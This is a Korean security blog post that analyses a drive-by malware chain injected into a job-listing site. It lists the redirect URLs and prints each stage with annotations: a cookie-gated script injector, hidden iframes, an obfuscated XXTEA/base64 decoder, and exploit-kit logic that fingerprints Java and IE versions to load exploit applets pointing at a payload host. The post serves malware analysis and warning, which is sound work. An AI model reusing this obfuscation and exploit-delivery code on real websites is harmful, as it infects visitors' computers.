
security/악성코드 유포

구인 사이트 교차로 → http://www.icross.co.kr Yszz 0.11 vip 악성 스크립트 유포중!!

발견지 : http://www.icross.co.kr [교차로]

            →http://festival.cocobau.com/adm_site/e_show/e_th_abd.js

               →http://173.245.86.205/pic/img.js

               →http://173.245.86.205/pic/img.html (Yszz 1.5 vip)

               → http://173.245.86.152/img/jpg.css (최종파일)

               → http://173.245.86.205/pic/swfobject.js

               → http://173.245.86.205/pic/jpg.js

               →http://173.245.86.205/pic/css.html


http://festival.cocobau.com/adm_site/e_show/e_th_abd.js


-----------------------------------------------------------------------------------------------


// First-stage injector, as found in the compromised e_th_abd.js.
// Gate: runs only when the 'ralrlea' cookie is absent, then sets that cookie
// with a 12-hour expiry, so a given browser is redirected at most once per
// 12 hours. A second visit or re-crawl inside that window sees no injection.
// Payload: document.write() of a percent-encoded string. The visible head
// decodes to `<script src=http://173` and the tail to `></script>`, i.e. a
// remote <script> include. The middle was elided ([생략]) by the post's author;
// per the chain listed on the page the target is presumably /pic/img.js.
// NOTE(review): confirm the full URL against an unmodified capture.
if(document.cookie.indexOf('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%31%37%33[생략]3E%3C%2F%73%63%72%69%70%74%3E"));}


http://173.245.86.205/pic/img.js


-----------------------------------------------------------------------------------------------


// Second-stage redirector (img.js). The User-Agent is lower-cased here and
// reused in the browser test below.
var Zcy6MU=navigator.userAgent.toLowerCase();

// Gate: only when the "mOV6Pgrf" marker cookie is absent. The second test
// searches the lower-cased UA for "Safari" with a capital S, so indexOf()
// always returns -1 and the apparent Safari exclusion never takes effect.
if(document.cookie.indexOf("mOV6Pgrf")==-1 && Zcy6MU.indexOf("Safari")==-1)

{

var expires=new Date();

// Marker cookie lives 24 hours, limiting the redirect to once per day per browser.
expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie="mOV6Pgrf=Yes;path=/;expires="+expires.toGMTString();

// Two 116x1 iframes without a border (effectively invisible to the visitor)
// load the next pages, img.html and css.html, from the same host.
document.write("<iframe width=\"116\" height=\"1\" frameborder=\"0\" src=\"http://173.245.86.205/pic/img.html\"></iframe>");

document.write("<iframe width=\"116\" height=\"1\" frameborder=\"0\" src=\"http://173.245.86.205/pic/css.html\"></iframe>");

}



http://173.245.86.205/pic/img.html

// Deobfuscation stub from img.html. Every name the script needs is stored
// percent-encoded and rebuilt with unescape(), so plain-text tokens such as
// "document", "write" or "fromCharCode" never appear in the file.
var K4Er = "%";

// The six fragments below concatenate to the percent-encoded form of the
// 16-character string "xoxo11YSzz11oxox". It is unescaped further down into
// ubo8KLEZHIPX2 and handed to kaixin() as its key argument.
var MDIxo=K4Er+"78"+K4Er+"6F";

var OIai8=K4Er+"78"+K4Er+"6F"+K4Er+"31";

var HHYWv=K4Er+"31"+K4Er+"59"+"%53";

var CvXWz=K4Er+"7A"+"%7A"+"%31";

var JZyjl=K4Er+"31"+"%6F"+"%78";

var ERb7H="%6F"+"%78";

// One declaration carrying several values:
//   XGpwn2        - the encoded key assembled above
//   AVgHbu2f      - alias for unescape
//   Cn6T4bG0znIi  - the encoded payload blob; the post's author shortened it
//                   with [생략] and the literal is split across lines, so this
//                   statement is not valid JavaScript as shown
//   HUx2Ydz       - encoded "document"
//   sac5pxhFS     - encoded "write"
//   ubo8KLEZHIPX2 - declared here, assigned later
var XGpwn2 =MDIxo+OIai8+HHYWv+CvXWz+JZyjl+ERb7H,AVgHbu2f=unescape,Cn6T4bG0znIi="

SxoCgWBKhwTnhbKKvyhglFbDI8vGLakQIWymnWKeCk

[생략]

V4rVoO9tDGGcT+gxv+YEN7BYdH+oBpSPPprdnJdlAqGPs4bg=

",HUx2Ydz=K4Er+"64"+"%6f"+"%63"+"%75"+"%6d"+"%65"+"%6e"+"%74",sac5pxhFS=

"%77"+"%72"+"%69"+"%74"+"%65",ubo8KLEZHIPX2;

// Encoded "String".
var kxin1s = "%53"+"%74"+"%72";

var B83pNx = kxin1s+"%69"+"%6e"+"%67";

// Encoded "fromCharCode", split into four pieces.
var kxin2s = "%66"+"%72"+"%6f";

var kxin3s = "%6d"+"%43"+"%68";

var kxin4s = "%61"+"%72"+"%43";

var kxin5s = "%6f"+"%64"+"%65";

var WjuQFO = kxin2s+kxin3s+kxin4s+kxin5s;

// fxTmFiR = "String", xZW9RVt = "fromCharCode"; the functions below call
// window[fxTmFiR][xZW9RVt](...), which is String.fromCharCode(...).
var fxTmFiR = AVgHbu2f(B83pNx);

var xZW9RVt = AVgHbu2f(WjuQFO);

// Encoded "Array"; used as window[x83QqGV] to build the lookup table.
var sATWUn = "%41"+"%72"+"%72"+"%61"+"%79";

var x83QqGV = AVgHbu2f(sATWUn);

// SnDN8 decodes to the literal text "str" and Z0b9A to "charCodeAt".
// Note that fkPj5 is therefore the three-character string "str", not a
// reference to any function parameter named str.
var SnDN8 = "%73"+"%74"+"%72";

var Z0b9A = "%63"+"%68"+"%61"+"%72"+"%43"+"%6f"+"%64"+"%65"+"%41"+"%74";

var fkPj5 = AVgHbu2f(SnDN8);

var hyYQ8 = AVgHbu2f(Z0b9A);

/**
 * Last step of the decode pipeline; laid out as a UTF-8 to UTF-16 converter.
 * The switch on (c >> 4) has a single-byte branch (0-7, copies str.charAt),
 * a two-byte branch (12-13) and a three-byte branch (14), each rebuilding a
 * code point via window[fxTmFiR][xZW9RVt] (String.fromCharCode).
 *
 * NOTE(review): as listed, the character codes are read from fkPj5, which is
 * the decoded literal "str", not from the `str` parameter. Its three codes and
 * the NaN returned past its end all select the single-byte branch, so the
 * function as transcribed copies `str` through unchanged. Confirm against the
 * original sample whether the packer or the transcription introduced this.
 *
 * @param {string} str - output of kaixin()
 * @returns {string} the joined output characters
 */
function tzWmUni(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=fkPj5[hyYQ8](i++);switch(c>>4)

{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=fkPj5[hyYQ8](i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=fkPj5[hyYQ8](i++);char3=fkPj5[hyYQ8](i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}

return out.join('');}

// Lookup table for ZjykejU6(): built with window[x83QqGV], i.e. new Array(...),
// indexed by character code, with -1 marking characters to skip. The middle of
// the table was elided ([생략]) by the post's author. The visible tail (26..51
// followed by five -1 entries) is consistent with a standard base64 alphabet.
// NOTE(review): verify the alphabet against a full copy of the sample.
var ZjykejU6Chars=new window[x83QqGV](-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,[생략]-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,

38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);

// HUx2Ydz now holds the plain string "document".
HUx2Ydz=AVgHbu2f(HUx2Ydz);

/**
 * First step of the decode pipeline: a table-driven base64-style decoder.
 * Reads four table values (YS1..YS4) per round through ZjykejU6Chars, skipping
 * characters mapped to -1, and emits three bytes from them with
 * String.fromCharCode (reached as window[fxTmFiR][xZW9RVt]). Character code 61
 * ('=') in the third or fourth position ends decoding and returns the output.
 *
 * The inline marker "Yszz 0.11 vip" in the body is the same string the post
 * title uses to name the kit, which makes it a usable static signature.
 *
 * @param {string} str - encoded payload text
 * @returns {string} decoded bytes as a binary string
 */
function ZjykejU6(str)

{var YS1,YS2,YS3,YS4;/*Yszz 0.11 vip*/var i,len,out;

len=str.length;i=0;out = "";

while(i<len)

{do{YS1=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS1==-1);

if(YS1==-1)

break;do{YS2=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS2==-1);

if(YS2==-1)

break;out+=window[fxTmFiR][xZW9RVt]((YS1<<2)|((YS2&0x30)>>4));

do{YS3=str.charCodeAt(i++)&0xff;if(YS3==61)

return out;

YS3=ZjykejU6Chars[YS3]}while(i<len&&YS3==-1);

if(YS3==-1)

break;out+=window[fxTmFiR][xZW9RVt](((YS2&0XF)<<4)|((YS3&0x3C)>>2));

do{YS4=str.charCodeAt(i++)&0xff;if(YS4==61)

return out;YS4=ZjykejU6Chars[YS4]}while(i<len&&YS4==-1);if(YS4==-1)

break;out+=window[fxTmFiR][xZW9RVt](((YS3&0x03)<<6)|YS4)}

return out}

/**
 * Converts an array of 32-bit words back into a binary string. Each word is
 * replaced in place by four characters, lowest byte first, using
 * String.fromCharCode (reached as window[fxTmFiR][xZW9RVt]).
 *
 * @param {number[]} v - word array; mutated by this function
 * @param {boolean} w - when truthy, the last word (read before conversion) is
 *   used as the length at which the joined string is cut
 * @returns {string} the joined characters, truncated when w is truthy
 */
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)

{v[i]=window[fxTmFiR][xZW9RVt](v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}

if(w){return v.join('').substring(0,sl);}

else{return v.join('');}}

/**
 * Packs a string into an array of 32-bit words, four character codes per word
 * with the first character in the lowest byte. Character codes read past the
 * end of the string are NaN and contribute 0 to the bitwise OR.
 *
 * @param {string} s - input string
 * @param {boolean} w - when truthy, the string length is appended as an extra word
 * @returns {number[]} the packed words
 */
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)

{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}

if(w){v[v.length]=len;}

return v;}

// Unescape the percent-encoded key in XGpwn2; the result is the second
// argument passed to kaixin() in the final decode call.
ubo8KLEZHIPX2=AVgHbu2f(XGpwn2);

/**
 * Second step of the decode pipeline: block decryption of the decoded payload.
 * The structure matches XXTEA decryption: the delta constant 0x9E3779B9, a
 * round count of floor(6 + 52/(n+1)), `sum` counting down to 0 by delta, and
 * the mixing expression over z, y, sum and k[p&3^e]. Both inputs are packed
 * into 32-bit words with str2long(); the result is unpacked with
 * long2str(v, true), which trims it to the length stored in the last word.
 *
 * @param {string} str - ciphertext as a binary string; "" returns "" at once
 * @param {string} Udkz - key string (only words k[0..3] are indexed)
 * @returns {string} decrypted data as a binary string
 */
function kaixin(str,Udkz){if(str==""){return"";}

var v=str2long(str,false);var k=str2long(Udkz,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}

z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}

return long2str(v,true);}

// sac5pxhFS now holds the plain string "write".
sac5pxhFS=AVgHbu2f(sac5pxhFS);

// KWZAooZ is assigned without var/let, so it becomes an implicit global.
KWZAooZ=Cn6T4bG0znIi;

// Decode pipeline: ZjykejU6 (base64-style decode) -> kaixin (decrypt with the
// key in ubo8KLEZHIPX2) -> tzWmUni (character conversion).
KWZAooZ=tzWmUni(kaixin(ZjykejU6(KWZAooZ), ubo8KLEZHIPX2));

// window["document"]["write"](...): the decoded content is written straight
// into the page, so the next stage exists only in the DOM at run time and is
// never visible in the served file. For analysis, the same pipeline can be run
// in an isolated sandbox with this call replaced by logging.
window[HUx2Ydz][sac5pxhFS] (KWZAooZ);


// Exploit-selection logic. The post lists it after the img.html stub without
// naming the file it came from (presumably the decoded output or jpg.js).
// NOTE(review): confirm the origin against a capture.
// It fingerprints the installed Java runtime and Internet Explorer version and
// injects a matching applet, <OBJECT> or iframe. The listing is partly elided
// by the post's author ([생략] and "....") and is not runnable as shown.
var RWkTTC8=navigator.userAgent.toLowerCase();

// Gate: marker cookie "Udz1szV=" absent and UA does not contain "bot" (keeps
// crawlers away from the exploit). The remaining conditions are elided.
if(document.cookie.indexOf("Udz1szV=")==-1 && RWkTTC8.indexOf("bot")==-1 && 

[생략]

{

// Flash Player version via SWFObject (swfobject.js is part of the chain on the
// page); the value is not used anywhere in the visible code.
var jHiJb2=deconcept.SWFObjectUtil.getPlayerVersion();

var expires=new Date();

// Marker cookie lives 24 hours: one attempt per browser per day.
expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie="Udz1szV=Yes;path=/;expires="+expires.toGMTString();

var kaixiny=document.createElement('body');

document.body.appendChild(kaixiny);

// deployJava.getJREs() reports the installed JRE versions. The result is
// coerced to a string, dots and underscores are stripped, and parseInt (no
// radix given) reads the leading digits, so a version such as "1.7.0_06"
// (constructed example) becomes 17006. Parsing stops at the first non-digit,
// so presumably only the first listed JRE is considered.
var kaixinm=deployJava.getJREs()+"";

kaixinm=parseInt(kaixinm.replace(/\.|\_/g,''));

// Java branch: values up to 17006. A NaN result (nothing parsed) fails this
// comparison and falls through to the IE iframe branch at the bottom.
if (kaixinm<=17006)

{

var kaixin=document.createElement('applet');

kaixin.width="1";

kaixin.height="1";

// Values 16000-16027 or 15000-15031: 1x1 applet "GondadGondadExp.class" from
// archive "0jDBDaQC.jpg" (presumably a JAR served under an image extension).
// The "dota" parameter carries the URL the post marks as the final file.
if((kaixinm<=16027 && kaixinm>=16000) || (kaixinm>=15000 && kaixinm<=15031)) 

{

kaixin.archive="0jDBDaQC.jpg";

kaixin.code="GondadGondadExp.class";

kaixin.setAttribute("dota","http://173.245.86.152/img/jpg.css");

document.body.appendChild(kaixin);

}

// Values 17000-17003, or what is left of 16000-16032 after the first branch.
// The third clause (>=15035 && <=15000) can never be true. Applet
// "gond1723.Gondattack.class" from "XyAPlXp.jpg"; the final-file URL is passed
// in "xiaomaolv" together with the fixed parameters bn, si and bs.
else if ((kaixinm<=17003 && kaixinm>=17000) || (kaixinm<=16032 && kaixinm>=16000) ||(kaixinm>=15035 && kaixinm<=15000))

{

kaixin.archive="XyAPlXp.jpg";

kaixin.code="gond1723.Gondattack.class";

kaixin.setAttribute("xiaomaolv","http://173.245.86.152/img/jpg.css");

kaixin.setAttribute("bn","woyouyizhixiaomaolv");

kaixin.setAttribute("si","conglaiyebuqi");

kaixin.setAttribute("bs","748");

document.body.appendChild(kaixin);

}

// Every other value up to 17006. The statement below is truncated ("....") in
// the post. For "msie 6" an <OBJECT> with the Java Plug-in classid is written;
// otherwise a 256x256 applet is appended. Both reference
// "cve2012xxxx.Gondvv.class" in "F8xzd.jpg" with the same parameters as above.
else

{

var ques3 = window.navigator.userAgent.toLowerCase();

if (ques3.indexOf("msie 6") > -1....write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://173.245.86.152/img/jpg.css'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'F8xzd.jpg'></OBJECT>");

else 

    {

        document.write("<br>");

        var kaixinq = document.createElement("body");

        document.body.appendChild(kaixinq);

        var kaixiny = document.createElement("applet");

        kaixiny.width = "256";

        kaixiny.height = "256";

        kaixiny.archive = "F8xzd.jpg";

        kaixiny.code = "cve2012xxxx.Gondvv.class";

        kaixiny.setAttribute("xiaomaolv", "http://173.245.86.152/img/jpg.css");

        kaixiny.setAttribute("bn", "woyouyizhixiaomaolv");

        kaixiny.setAttribute("si", "conglaiyebuqi");

        kaixiny.setAttribute("bs", "748");

        document.body.appendChild(kaixiny);

    }

 }

}

// Java value above 17006, or not parsed at all: choose by Internet Explorer
// version instead. The iframe sources are relative, so they resolve against
// the directory of the page running this script. Browsers other than IE 6, 7
// and 8 receive nothing in the visible code.
else {


       // pcss is assigned but not used in the visible code.
       var pcss=navigator.userAgent.toLowerCase();

       var UaYcKzD2 = window.navigator.userAgent.toLowerCase();

       // IE 8 is sent to thotMy.html.
       if ((UaYcKzD2.indexOf('msie 8.0') > -1))

       {


        document.writeln("<iframe src=thotMy.html><\/iframe>");


       }


       // IE 6 and IE 7 are sent to 1ryxA.html.
       else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1)) 

        {


document.writeln("<iframe src=1ryxA.html><\/iframe>");


        }


}

}


유심히 지켜봐야 할 사이트이다. 구인·구직 정보를 찾으러 들어갔다가 악성코드에 감염되지 않도록 조심해야겠다! 위 스크립트는 설치된 Java 버전과 IE 버전을 확인해 공격 코드를 고르므로, Java와 브라우저를 최신 버전으로 유지하는 것이 중요하다.